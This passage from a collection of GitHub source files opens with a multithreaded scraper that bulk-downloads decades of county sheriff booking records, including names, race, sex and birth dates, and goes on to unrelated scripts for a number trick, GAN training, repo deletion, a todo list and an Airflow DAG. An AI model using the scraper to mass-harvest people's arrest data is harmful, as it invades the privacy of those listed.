'http://www.polksheriff.org/inq/Pages/Jail.aspx'\r\nBOOKING_URL = 'http://www.polksheriff.org/inq/pages/inmate.aspx?BookingNumber='\r\nTHEAD_COUNT = 50\r\n\r\ndef main():\r\n date_queue = queue.Queue()\r\n\r\n start = datetime.now()\r\n print(\"[!] Started processing at: {}\".format(start))\r\n\r\n view_state = refresh_viewstate()\r\n dates = get_dates('1990-01-01', '2017-01-03')\r\n\r\n for arrest_date in dates:\r\n date_queue.put(arrest_date)\r\n\r\n for thread_id in range(THEAD_COUNT):\r\n worker = Thread(target=process_arrests, args=(thread_id, view_state, date_queue,))\r\n worker.setDaemon(True)\r\n worker.start()\r\n\r\n print('- Waiting on workers to complete...')\r\n date_queue.join()\r\n\r\n end = datetime.now()\r\n print(\"[!] Ended processing at: {}\".format(end))\r\n\r\ndef process_arrests(thread_id, view_state, dates):\r\n while True:\r\n arrest_date = dates.get()\r\n\r\n print('- Thread #{}: Capturing arrests for: {}'.format(thread_id, arrest_date))\r\n arrests = capture_arrests(view_state, arrest_date.month, arrest_date.day, arrest_date.year)\r\n\r\n if arrests is None:\r\n print('- Adding arrest date back into queue: {}'.format(arrest_date))\r\n dates.put(arrest_date)\r\n else:\r\n save_arrests(arrests,arrest_date)\r\n dates.task_done()\r\n\r\ndef save_arrests(arrests, arrest_date):\r\n save_file = 'data/arrests_{}-{}-{}.csv'.format(arrest_date.year, arrest_date.month, arrest_date.day)\r\n with open(save_file,'w') as fh:\r\n header = [\r\n 'number', 'last_name', 'middle_name', 'first_name', 'race', 'sex',\r\n 'dob', 'booking_date', 'release_date', 'location'\r\n ]\r\n\r\n fh.write(','.join(header)+'\\n')\r\n for arrest in arrests:\r\n line = '{}\\n'.format(arrest)\r\n fh.write(line)\r\n\r\ndef get_dates(start_date, end_date):\r\n dates = []\r\n\r\n start = [int(x) for x in start_date.split('-')]\r\n end = [int(x) for x in end_date.split('-')]\r\n\r\n d1 = date(start[0], start[1], start[2])\r\n d2 = date(end[0], end[1], end[2])\r\n\r\n for i in range((d2-d1).days + 1):\r\n dates.append(d1 + td(days=i))\r\n\r\n return dates\r\n\r\ndef refresh_viewstate():\r\n parms = {}\r\n response = requests.get(SEARCH_URL)\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n search_form = soup.find('form',id='aspnetForm')\r\n inputs = search_form.findAll('input')\r\n\r\n required_fields = ['__VIEWSTATE','__VIEWSTATEGENERATOR','__EVENTVALIDATION']\r\n for input in inputs:\r\n if input.get('id') in required_fields:\r\n parms[input.get('id')] = input.get('value')\r\n\r\n return parms\r\n\r\ndef capture_arrests(parms, month, day, year):\r\n arrests = []\r\n\r\n parms['ctl00$ctl15$g_413cdd9d_e152_40ad_9a7a_a595a01d2d51$ctl00$ddlBookingMonth'] = str(month)\r\n parms['ctl00$ctl15$g_413cdd9d_e152_40ad_9a7a_a595a01d2d51$ctl00$ddlBookingDay'] = str(day)\r\n parms['ctl00$ctl15$g_413cdd9d_e152_40ad_9a7a_a595a01d2d51$ctl00$ddlBookingYear'] = str(year)\r\n parms['ctl00$ctl15$g_413cdd9d_e152_40ad_9a7a_a595a01d2d51$ctl00$btnBookingDateSearch'] = 'Search'\r\n\r\n try:\r\n search = requests.post(SEARCH_URL, data=parms)\r\n soup = BeautifulSoup(search.content, 'html.parser')\r\n grid = soup.find('table', id=re.compile(\"_grdResults\"))\r\n\r\n for row in grid.findAll('tr'):\r\n cols = [x.text for x in row.findAll('td')]\r\n\r\n if len(cols) > 0:\r\n try:\r\n be = BookingEntry()\r\n be.booking_number = cols[0]\r\n\r\n name = cols[1]\r\n name_parts = [x.strip() for x in name.split(',')]\r\n mid_parts = name_parts[1].split(' ', 1)\r\n be.first_name = name_parts[0]\r\n be.middle_name = mid_parts[1] if len(mid_parts) > 1 else ''\r\n be.last_name = mid_parts[0]\r\n\r\n race_sex = cols[2]\r\n be.race = race_sex[:len(race_sex) // 2]\r\n be.sex = race_sex[len(race_sex) // 2:]\r\n\r\n be.dob = cols[3]\r\n be.booking_date = cols[4]\r\n be.release_date = cols[5]\r\n be.location = cols[6]\r\n\r\n arrests.append(be)\r\n except Exception as ex:\r\n pass\r\n except Exception as ex:\r\n return None\r\n\r\n return arrests\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ustayready/polk-sheriff-arrests","sub_path":"pcso.py","file_name":"pcso.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"1997311827","text":"import random\nimport itertools\n\n\n# start with 21 numbers\nnumbers = list(range(1, 22))\n# randomize the numbers\nrandom.shuffle(numbers)\nfor i in range(3):\n # split number into three groups of seven\n groups = [[numbers[i + j] for i in range(0, 21, 3)] for j in range(3)]\n print(f'group1: {groups[0]}\\ngroup2: {groups[1]}\\ngroup3: {groups[2]}')\n while True:\n input_text = input('think of a number and select the group (number only: 1, 2, 3): ')\n if input_text not in ['1', '2', '3']:\n print('you need to pick 1, 2, or 3')\n continue\n else:\n selected_group = int(input_text)\n break\n print('\\n')\n # put selected group in th middle\n groups[1], groups[selected_group - 1] = groups[selected_group - 1], groups[1]\n # flatten the list and keep going\n numbers = list(itertools.chain(*groups))\nprint(f'you are thinking of {numbers[10]}')\n","repo_name":"mchant/twenty_one_number_magic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13505559529","text":"import math\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom PIL import Image\n\nfrom utility import (\n calc_FID,\n from_torch,\n to_torch,\n get_invert_permutation,\n)\n\ncuda = torch.cuda.is_available()\nrng = np.random.default_rng()\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1 or classname.find(\"Linear\") != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find(\"BatchNorm\") != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\nclass Reshape(nn.Module):\n def __init__(self, *shape):\n super().__init__()\n\n self.shape = shape\n\n def forward(self, x):\n return x.reshape(x.shape[0], *self.shape)\n\n\nclass Generator(nn.Module):\n def __init__(self, length, use_time_invariant_term):\n super(Generator, self).__init__()\n self.use_time_invariant_term = use_time_invariant_term\n self.length = length\n latent_size = 100\n nc = 1\n nz = 100\n ngf = 64\n\n # https://kikaben.com/dcgan-mnist/\n self.decoder = nn.Sequential(\n Reshape(nz, 1, 1),\n nn.ConvTranspose2d(nz, ngf * 2, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # state size. (ngf*2) x 4 x 4\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n # state size. (ngf) x 8 x 8\n nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False),\n )\n\n z1_size = length * latent_size\n z2_size = length * latent_size\n\n self.seq1 = nn.Sequential(\n nn.Flatten(),\n nn.Linear(z1_size, z1_size),\n nn.LeakyReLU(0.01),\n nn.Linear(z1_size, z1_size),\n nn.Unflatten(-1, (length, latent_size)),\n )\n\n self.seq2 = nn.Sequential(\n nn.Flatten(),\n nn.Linear(z2_size, z2_size),\n nn.LeakyReLU(0.01),\n nn.Linear(z2_size, z2_size),\n nn.Unflatten(-1, (length, latent_size)),\n )\n\n self.linear_corr = nn.Linear(latent_size * 2, latent_size * 2)\n self.tanh = nn.Tanh()\n\n def forward(self, z1, z2):\n batch_size = z1.shape[0]\n latent_size = z1.shape[-1] // 2\n\n # joint_dense\n x1 = self.seq1(z1[:, :, :latent_size]) # length x 200 => length x 100\n x2 = self.seq2(z1[:, :, -latent_size:]) # length x 200 => length x 100\n corr = self.linear_corr(z2) # length x 200 => length x 200\n\n hidden = torch.cat((x1, x2), dim=-1) # => length x 200\n if self.use_time_invariant_term:\n hidden += corr # => length x 200\n\n # time distribute decode\n hidden = hidden.reshape(batch_size * self.length * 2, latent_size) # => 100\n hidden = self.decoder(hidden)\n hidden = hidden.reshape(\n batch_size, self.length, 2, 1, 16, 16\n ) # => length x 2 x 1 x 16 x 16\n return self.tanh(hidden)\n\n\nclass Discriminator(nn.Module):\n def __init__(self, length):\n super(Discriminator, self).__init__()\n alpha = 0.01\n self.length = length\n self.size = length * 2 * 100\n self.activation = nn.ReLU()\n ndf = 64\n self.encoder = nn.Sequential(\n nn.Conv2d(1, ndf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 16 x 16\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 8 x 8\n nn.Conv2d(ndf * 2, 1, 4, 2, bias=False),\n nn.Sigmoid(),\n )\n\n self.linear = nn.Linear(self.length * 2, 1)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n batch_size = x.shape[0]\n # time distribute encode\n x = x.reshape(batch_size * self.length * 2, 1, 16, 16) # => 1 x 16 x 16\n x = self.encoder(x) # => 100\n x = x.reshape(batch_size, self.length * 2) # => length x 2 x 100\n\n # joint_dense\n return self.sigmoid(self.linear(x))\n\n\ndef sample_x(batch_size, state_list, length):\n stream_size = state_list.shape[0]\n stream_length = state_list.shape[1]\n\n # stream_size個の動画からランダムにbatch_size個サンプリング\n stream_idxes = rng.choice(stream_size, batch_size)\n # stream_size x stream_length x 2 x 1 x w x h => batch_size x stream_length x 2 x 1 x w x h\n seq = state_list[stream_idxes, ...]\n\n # それぞれのサンプルについて、stream_length長の動画からランダムにlength長の区間を抽出\n begin_idx = rng.choice(stream_length - length - 1, batch_size)\n idx_span = np.array([np.arange(b, b + length) for b in begin_idx])\n # batch_size x stream_length x 2 x 1 x w x h => batch_size x length x 2 x 1 x w x h\n seq = np.stack([seq[i, idx_span[i], ...] for i in range(batch_size)], axis=0)\n return to_torch(seq)\n\n\ndef sample_z(batch_size, length):\n return torch.randn(batch_size, length, 200) # => length x 200\n\n\ndef save_gif(images, i, data_dir):\n # images: batch_size x length x 2 x 1 x w x h\n images = (images + 1) / 2 * 255\n size = images.shape[4]\n batch_size = images.shape[0]\n\n for b in range(batch_size):\n images1 = images[b, :, 0, 0, :, :]\n images2 = images[b, :, 1, 0, :, :]\n images_cat = np.concatenate((images1, images2), axis=2)\n images_flat = np.reshape(images_cat, (-1, size, size * 2))\n\n images_pil = []\n for image in images_flat:\n images_pil.append(Image.fromarray(image).convert(\"P\"))\n images_pil[0].save(\n data_dir / \"generate_image_{}_batch_{}.gif\".format(i, b),\n save_all=True,\n append_images=images_pil[1:],\n optimize=False,\n duration=40,\n loop=0,\n )\n\n\ndef fit_q(\n images1,\n images2,\n batch_size=20,\n n_step=20000,\n length=4,\n use_time_invariant_term=False,\n debug=False,\n data_dir=None,\n):\n if data_dir is None:\n raise TypeError(\"データディレクトリの指定が不正です\")\n mode = \"GAN\"\n # mode = \"f-GAN:KL\"\n G = Generator(length, use_time_invariant_term)\n D = Discriminator(length)\n G.apply(weights_init)\n D.apply(weights_init)\n adversarial_loss = nn.BCELoss()\n d_optimizer = optim.Adam(D.parameters(), lr=1e-4)\n g_optimizer = optim.Adam(G.parameters(), lr=1e-4)\n if debug:\n print(G)\n print(D)\n if cuda:\n G.cuda()\n D.cuda()\n\n real_label = torch.ones(batch_size, 1, requires_grad=False)\n fake_label = torch.zeros(batch_size, 1, requires_grad=False)\n # real_label = torch.ones(batch_size, 1, requires_grad=False) * 0.7\n # fake_label = torch.ones(batch_size, 1, requires_grad=False) * 0.3\n\n FID_all = []\n loss_all = []\n js_all = []\n d_loss_std_all = []\n grad_norm_all = []\n failure_check = []\n js_ema = None\n d_loss_ema = None\n f_star = lambda t: torch.exp(t - 1)\n state_list = torch.stack(\n [to_torch(images1), to_torch(images2)], dim=2\n ) # stream_size x stream_length x w x h => stream_size x stream_length x 2 x w x h\n state_list = torch.unsqueeze(\n state_list, 3\n ) # => stream_size x stream_length x 2 x 1 x w x h\n\n for i in range(n_step):\n # print(i, n_step)\n # ====================\n # Discriminatorの学習\n # ====================\n d_optimizer.zero_grad()\n\n # fake xの生成\n z1 = sample_z(batch_size, length) # => length x 200\n z2 = sample_z(batch_size, length) # => length x 200\n fake_x = G(z1, z2)\n # real xの生成\n real_x = sample_x(batch_size, state_list, length) # => length x 2 x 1 x w x h\n\n # リアルのサンプルとニセのサンプルを正しく見分けられるように学習\n D_fake = D(fake_x.detach())\n D_real = D(real_x)\n if mode == \"GAN\":\n fake_loss = adversarial_loss(D_fake, fake_label)\n real_loss = adversarial_loss(D_real, real_label)\n d_loss = real_loss + fake_loss\n elif mode == \"f-GAN:KL\":\n fake_loss = f_star(D_fake).mean()\n real_loss = -D_real.mean()\n d_loss = real_loss + fake_loss\n\n d_loss.backward()\n d_optimizer.step()\n\n # ====================\n # Generatorの学習\n # ====================\n g_optimizer.zero_grad()\n\n # fake xの生成\n z1 = sample_z(batch_size, length) # => length x 200\n z2 = sample_z(batch_size, length) # => length x 200\n fake_x = G(z1, z2)\n\n # real xの生成\n real_x = sample_x(batch_size, state_list, length) # => length x 2 x 1 x w x h\n if i % 100 == 0:\n torch.set_printoptions(precision=1, sci_mode=False, linewidth=200)\n print(real_x[0, 0, 0, 0, :, :])\n # print(real_x[0, 1, 0, 0, :, :])\n print(fake_x[0, 0, 0, 0, :, :].detach())\n # print(fake_x[0, 1, 0, 0, :, :].detach())\n torch.set_printoptions(profile=\"default\")\n\n # Discriminatorを騙すように学習\n D_fake = D(fake_x)\n D_real = D(real_x)\n if mode == \"GAN\":\n fake_loss = adversarial_loss(D_fake, real_label)\n real_loss = adversarial_loss(D_real, fake_label)\n # print(fake_loss)\n # print(real_loss)\n g_loss = fake_loss + real_loss\n elif mode == \"f-GAN:KL\":\n fake_loss = -f_star(D_fake).mean()\n real_loss = D_real.mean()\n g_loss = real_loss + fake_loss\n\n g_loss.backward()\n g_optimizer.step()\n\n if mode == \"GAN\":\n js = (-d_loss.item() + 2 * math.log(2)) / 2\n elif mode == \"f-GAN:KL\":\n js = -d_loss.item()\n\n # JSのEMA\n if js_ema is None:\n js_ema = js\n else:\n alpha = 0.001\n js_ema = alpha * js + (1 - alpha) * js_ema\n\n # Dlossの分散\n if d_loss_ema is None:\n d_loss_ema = d_loss.item()\n d_loss_std = 0\n else:\n alpha = 0.001\n d_loss_ema = alpha * d_loss.item() + (1 - alpha) * d_loss_ema\n d_loss_std = (\n alpha * (d_loss.item() - d_loss_ema) ** 2 + (1 - alpha) * d_loss_std\n )\n\n # 崩壊モードチェック\n g_score = D_fake.mean()\n d_score = 1 / 2 * D_real.mean() + 1 / 2 * (1 - D_fake.mean())\n\n if i % 100 == 0 and debug:\n print(\n \"[Count %d/%d] [JS: %f] [G loss: %f] [D loss: %f]\"\n % (i, n_step, js, g_loss.item(), d_loss.item())\n )\n\n if i % 100 == 0:\n failure_check.append((i, d_score.item(), g_score.item()))\n FID_all.append((i, calc_FID(from_torch(fake_x), from_torch(real_x))))\n js_all.append((i, js, js_ema))\n loss_all.append((i, d_loss.item(), g_loss.item()))\n d_loss_std_all.append((i, d_loss_std))\n\n # 勾配のノルム\n grad_norm = 0\n for d in D.parameters():\n param_norm = d.grad.data.norm(2)\n grad_norm += param_norm.item() ** 2\n for g in G.parameters():\n param_norm = g.grad.data.norm(2)\n grad_norm += param_norm.item() ** 2\n grad_norm = grad_norm ** (1.0 / 2)\n grad_norm_all.append((i, grad_norm))\n\n if i % 1000 == 0:\n save_gif(real_x.detach().numpy(), \"real_{}\".format(i), data_dir)\n save_gif(fake_x.detach().numpy(), \"fake_{}\".format(i), data_dir)\n\n return {\n \"G\": G,\n \"D\": D,\n \"batch_size\": batch_size,\n \"length\": length,\n \"failure_check\": pd.DataFrame(\n failure_check, columns=[\"i\", \"d_score\", \"g_score\"]\n ).set_index(\"i\"),\n \"FID_all\": pd.DataFrame(FID_all, columns=[\"i\", \"FID\"]).set_index(\"i\"),\n \"js_all\": pd.DataFrame(js_all, columns=[\"i\", \"js\", \"js_ema\"]).set_index(\"i\"),\n \"loss_all\": pd.DataFrame(loss_all, columns=[\"i\", \"d_loss\", \"g_loss\"]).set_index(\n \"i\"\n ),\n \"d_loss_std_all\": pd.DataFrame(\n d_loss_std_all, columns=[\"i\", \"d_loss_std_all\"]\n ).set_index(\"i\"),\n \"grad_norm_all\": pd.DataFrame(\n grad_norm_all, columns=[\"i\", \"grad_norm_all\"]\n ).set_index(\"i\"),\n \"js\": js_ema,\n }\n","repo_name":"ysasano/gaii","sub_path":"src/cnn/gaii_joint_cnn.py","file_name":"gaii_joint_cnn.py","file_ext":"py","file_size_in_byte":12607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22558719733","text":"import json #--> module json\n\nchemin = \"/home/vagrant/fichier.json\"\n\n\"\"\"\n#Pour ecrire \nwith open(chemin, \"w\") as f: \n #json.dump(\"Bonjour\", f)\n #json.dump(list(range(10)), f) # --> avec une liste mais pas lisible\n json.dump(list(range(10)), f, indent=4) #--> plus lisible avec une indentation de 4\n\"\"\"\n\n#Pour lire\nwith open(chemin, \"r\") as f: \n liste = json.load(f)\n print(liste)\n print(type(liste))","repo_name":"thegodsson/PYTHON_UDEMY","sub_path":"fichier_json.py","file_name":"fichier_json.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40806705786","text":"import typer\nimport terrachicken.functions as functions\n\napp = typer.Typer()\n\n@app.command(\"repo\")\ndef delete(name: str = typer.Option(None, \"-n\")):\n if name == None:\n functions.listAllRepo()\n name = str(typer.prompt(\"Enter Repo Name to Delete: \"))\n else:\n pass\n org = functions.getUserName()\n full_name = f\"{org}/{name}\"\n typer.confirm(f\"Are you sure you want to delete {org}/{name}?\" , abort=True )\n functions.deleteRepo(full_name)\n\n@app.command(\"workspace\")\ndef delete(ws_name: str = \"\"):\n functions.listWorkspaces()\n ws_name = str.lower(input(\"Enter the name of Workspace(s): \")).split()\n ws_name_formatted = typer.style(f\"{ws_name}\", fg=typer.colors.RED)\n for name in ws_name:\n try:\n functions.deleteWorkspaces(name)\n except:\n typer.echo(f\"\\n {ws_name_formatted} not found in active Workspaces.\")\n finally:\n typer.echo(\"Remaining Workspaces:\")\n typer.echo(\"Exec-Mode | Workspace ID | Workspace Name\")\n functions.listWorkspaces()","repo_name":"Thaley17/TerraChicken","sub_path":"terrachicken/src/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73369016360","text":"with open('output.txt') as f:\n todo = f.read().split('\\n')\n\n\n\nwhile True:\n todo = []\n print('do you want to input anything :')\n print('Enter what you want to do here')\n to = input('')\n todo.append(to)\n print('we have added ')\n print(\"You need to do : \\n\")\n for i in todo:\n with open('output.txt', 'w') as f:\n for item in todo: #note: don't call your variable list as that is a python reserved keyword\n f.write(str(item)+'\\n')\n print(i, end = '\\n')\n print('\\ndo you want to add more y / n?')\n yn = input('')\n if yn == 'y':\n continue\n elif yn != 'n':\n print('I did not understand type again')\n print('do you want to add more y / n?')\n yn = input('')\n else:\n print('you need to :')\n print('')\n with open('output.txt', 'w') as f:\n for item in todo: \n f.write(str(item)+'\\n')\n print(i, end = ' \\u2713 \\n')\n break\n\nif len(todo) >= 1:\n print('have you done any of your tasks?')\n done = input('enter what task you have done: \\n')\n todo.remove(done)\n print('you need to do:')\n print('')\n with open('output.txt', 'w') as f:\n for item in todo: \n f.write(str(item)+' \\n')\n print(i, end = ' \\u2713 \\n')\nelse:\n print('That is not on your list')","repo_name":"henry-glitch/computer-science","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11462023094","text":"from util import *\nfrom commit_util import *\nfrom difflib import *\n\ndef get_chunk_size(chunks):\n if (len(chunks) == 0):\n return 0\n sz = 0\n chunks = chunks[1:]\n # find next chunks header\n while(len(chunks) > 0):\n if(chunks[0][:2] == \"@@\"):\n break\n sz = sz + 1\n chunks = chunks[1:]\n return sz\n\n\ndef parse_chunk_info(data):\n chunk_info = {}\n data = data.split(' ')\n assert(data[0] == data[3] == \"@@\")\n line_A = data[1].split(',')\n line_B = data[2].split(',')\n \n chunk_info[\"start_A\"] = int(line_A[0].replace('-', ''))\n chunk_info[\"offset_A\"] = int(line_A[1]) if (len(line_A) > 1) else -1\n chunk_info[\"start_B\"] = int(line_B[0].replace('+', ''))\n chunk_info[\"offset_B\"] = int(line_B[1]) if (len(line_B) > 1) else -1\n chunk_info[\"func_sig\"] = \" \".join(data[4:])\n \n return chunk_info\n\n\ndef get_diff_tag(ch):\n if ch == '+':\n return 'a'\n elif ch == '-':\n return 'd'\n else:\n return 'e'\n\n\n## Not needed yet.\ndef parse_chunk_body(chunks):\n lines = []\n tags = []\n for line in chunks:\n tag = get_diff_tag(line[0])\n tags.append(tag)\n lines.append(line[1:])\n \n return [lines, tags]\n\n\ndef parse_chunks(data):\n chunks_data = []\n while(len(data) > 0):\n sz = get_chunk_size(data)\n header = parse_chunk_info(data[0])\n # body = parse_chunk_body(chunks[1:sz+1])\n body = []\n chunks_data.append({\"header\":header, \"body\":body})\n data = data[sz+1:]\n \n return chunks_data\n\n\ndef parse_delta(delta):\n delta = delta.split('\\n')\n\n if (len(delta) < 4):\n ## binary files\n return None\n elif(delta[4][:2] == \"@@\"):\n targets_info, metadata = delta[0], delta[1]\n old_file, new_file = delta[2], delta[3]\n chunks_data = parse_chunks(delta[4:])\n else:\n ## Such as deleted files, num of header line can be different.\n targets_info, msg, metadata = delta[0], delta[1], delta[2]\n old_file, new_file = delta[3], delta[4] \n chunks_data = parse_chunks(delta[5:])\n \n return chunks_data\n\n\ndef build_index_A(A):\n dic_A, index_A = {}, []\n cnt = 1\n for line in A:\n if line in dic_A:\n num = dic_A[line]\n index_A.append(str(num))\n else:\n dic_A[line] = str(cnt)\n index_A.append(str(cnt))\n cnt += 1\n\n return index_A, dic_A\n\n\ndef build_index_B(B, dic_A):\n index_B = []\n cnt = len(dic_A) + 1\n for line in B:\n if line in dic_A:\n num = dic_A[line]\n index_B.append(num)\n else:\n index_B.append(str(cnt))\n cnt += 1\n return index_B\n\n\ndef build_index(A, B):\n index_A, dic_A = build_index_A(A)\n index_B = build_index_B(B, dic_A)\n\n ## diff\n datas = list(unified_diff(index_A, index_B))[3:]\n # print_json(datas)\n\n # p1 = [\"1\", \"1\", \"1\"]\n # p1 = \"\".join(['[' + sub + ']' for sub in p1])\n \n # for i in range(0, len(index_A) - len(p1) + 1):\n # tmp_index, _ = build_index_A(index_A[i:])\n # tmp = \"\".join(['[' + sub + ']' for sub in tmp_index])\n # if(p1 in tmp):\n # print_json(A)\n # input()\n # break\n\n return index_A, index_B\n\n\n# comb = list(combinations(pat, 2))\n# v = []\n# for item in comb:\n# if item[0] == item[1]:\n# v.append(True)\n# else:\n# v.append(False)\n# print(v)\n\ndef valid(l):\n ## pat: \"ABA\"\n if not(l[0] != l[1]):\n return False\n if not(l[0] == l[2]):\n return False\n return True\n\nfrom itertools import combinations\n\ndef build_histogram(A, B):\n try:\n if(len(A) < 1 or len(B) < 1): return\n # A = \"l m n o x z y z x x y x z o z l x y\".split(\" \")\n # B = \"l m n o x y z y x z y l x y\".split(\" \")\n index_A, _ = build_index(A, B)\n\n # pat = \"12331\"\n # pat2 = \"132\"\n pat = \"121\"\n pat2 = \"212\"\n l = index_A\n for i in range(0, len(l) - len(pat) + 1):\n tmp_index, _ = build_index_A(l[i:])\n tmp_index = [ \"[\" + ch + \"]\" for ch in tmp_index]\n tmp_index = \"\".join(tmp_index)\n\n tmp_pat = [ \"[\" + ch + \"]\" for ch in pat]\n tmp_pat = \"\".join(tmp_pat)\n\n if tmp_pat in tmp_index:\n ## build d(symbolic pat -> concrete pat2)\n idx = tmp_index.find(tmp_pat)\n index = A[idx + i:]\n d = {}\n for j in range(0, len(pat)):\n if pat[j] not in d:\n d[pat[j]] = index[j]\n \n con = []\n for p in pat2:\n con.append(d[p])\n \n tmp_con = [ \"[\" + ch + \"]\" for ch in con]\n tmp_con = \"\".join(tmp_con)\n\n tmp_B = [ \"[\" + ch + \"]\" for ch in B]\n tmp_B = \"\".join(tmp_B)\n\n if tmp_con in tmp_B:\n print(\"[*] found!\")\n print_json(A)\n print_json(B)\n input()\n except:\n print(\"except\") \n # v = valid(tmp_index)\n # if v:\n # p1 = A[i]\n # p2 = A[i+1]\n # p3 = A[i+2]\n # assert p1 == p3\n # for j in range(0, len(B) - 3 + 1):\n # if (B[j] == B[j + 2] == p2) and (B[j + 1] == p1):\n # print_json(A)\n # print_json(B)\n # print(\"[*] found!\")\n # input()\n # i = len(l) - len(pat) + 1\n # break\n\n pass\n\n\ndef build_histogram2(A, B):\n index_A, _ = build_index(A, B)\n\n pat = \"ABA\"\n l = index_A\n for i in range(0, len(l) - len(pat) + 1):\n tmp_index, _ = build_index_A(l[i:])\n v = valid(tmp_index)\n if v:\n p1 = A[i]\n p2 = A[i+1]\n p3 = A[i+2]\n assert p1 == p3\n for j in range(0, len(B) - 3 + 1):\n if (B[j] == B[j + 2] == p2) and (B[j + 1] == p1):\n print_json(A)\n print_json(B)\n print(\"[*] found!\")\n input()\n i = len(l) - len(pat) + 1\n break\n\n pass\n\ndef pattern_mathcing(currComm: Commit, prevComm: Commit, repo: Repo):\n diffs = prevComm.diff(currComm)\n\n for diff in diffs:\n if diffType(diff) != 'M':\n continue\n\n pathA = diff.a_blob.path if diff.a_blob else None\n pathB = diff.b_blob.path if diff.b_blob else None\n \n if not pathA or not pathB:\n continue\n \n assert pathA == pathB\n\n path = pathA\n\n \n try:\n delta = repo.git.diff(prevComm, currComm, path)\n except:\n print(\"[-] repo.git.diff() Error!\")\n return\n \n chunks_data = parse_delta(delta)\n if not chunks_data:\n return\n file_data_A = repo.git.show('{}:{}'.format(prevComm.hexsha, path))\n file_data_B = repo.git.show('{}:{}'.format(currComm.hexsha, path))\n\n try:\n for chunk in chunks_data:\n start_A = chunk[\"header\"][\"start_A\"]\n offset_A = chunk[\"header\"][\"offset_A\"]\n start_B = chunk[\"header\"][\"start_B\"]\n offset_B = chunk[\"header\"][\"offset_B\"]\n\n data_A = file_data_A.split(\"\\n\")[start_A - 1 : start_A + offset_A - 1]\n data_B = file_data_B.split(\"\\n\")[start_B - 1 : start_B + offset_B - 1]\n\n build_histogram(data_A, data_B)\n \n except UnicodeEncodeError:\n print(\"[-] UnicodeEncodeError!\")\n\n pass\n\n\n# EOF\n","repo_name":"topcue/binary-gleaner","sub_path":"chunk.py","file_name":"chunk.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42383540911","text":"# -*- coding:utf-8 -*-\n\nfrom datetime import datetime\n\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.providers.snowflake.operators.snowflake import SnowflakeOperator\n\nfrom get_csv_files import make_teams_message_country_daily\nfrom get_csv_files import make_teams_message_country_longterm\n\ndefault_args = {\n 'owner': 'CHEQUER',\n 'depends_on_past': False,\n 'start_date': datetime(2020, 7, 16),\n}\n\ndag = DAG(\n dag_id='teams_webhook_country',\n default_args=default_args,\n catchup=False,\n schedule_interval='00,10 01 * * *')\n\n\ndef which_path(**kwargs):\n min = kwargs['execution_date'].minute\n # min=0\n if min == 0:\n d = 'upload'\n else:\n d = 'pass'\n return d\n\n\ndef check_tri_week(**kwargs):\n scheduled_date = kwargs['task_instance'].xcom_pull(task_ids='send_message_longterm', key='teams_long_term')\n date = str(kwargs['execution_date'])\n date = date[:10]\n print(\"예정된 날짜 : \", scheduled_date)\n date = datetime.strptime(date, '%Y-%m-%d')\n # date=scheduled_date\n if date == scheduled_date:\n d = 'yes'\n else:\n d = 'no'\n return d\n\n\ncountries = ['us', 'kr', 'br']\noptions = ['upload', 'pass']\nis_tri = ['yes', 'no']\ncountries_fullname = [\"'United States'\", \"'South Korea'\", \"'Brazil'\"]\ncountries_shortname = [\"'us'\", \"'kr'\", \"'br'\"]\ncolor = ['0067a3', 'ffffff', '008000']\nsupersets = ['', '',\n '']\nrepetition_number = len(countries_fullname)\n\nis_oclock = BranchPythonOperator(\n task_id='check_is_oclock',\n provide_context=True,\n python_callable=which_path,\n dag=dag\n)\nsend_message_longterm = PythonOperator(\n task_id='send_message_longterm',\n provide_context=True,\n python_callable=make_teams_message_country_longterm.get_message,\n op_kwargs={'countries_fullname': countries_fullname, 'countries_shortname': countries_shortname,\n 'repetition_number': repetition_number, 'supersets': supersets, 'countries': countries, 'color': color},\n dag=dag\n)\n\nis_tri_week = BranchPythonOperator(\n task_id='is_tri_week',\n provide_context=True,\n python_callable=check_tri_week,\n dag=dag\n)\n\nsend_message_daily = PythonOperator(\n task_id='send_message_daily',\n provide_context=True,\n python_callable=make_teams_message_country_daily.get_message,\n op_kwargs={'countries_fullname': countries_fullname, 'countries_shortname': countries_shortname,\n 'repetition_number': repetition_number, 'supersets': supersets, 'countries': countries, 'color': color},\n dag=dag\n)\n\nfinish_send_long_term = 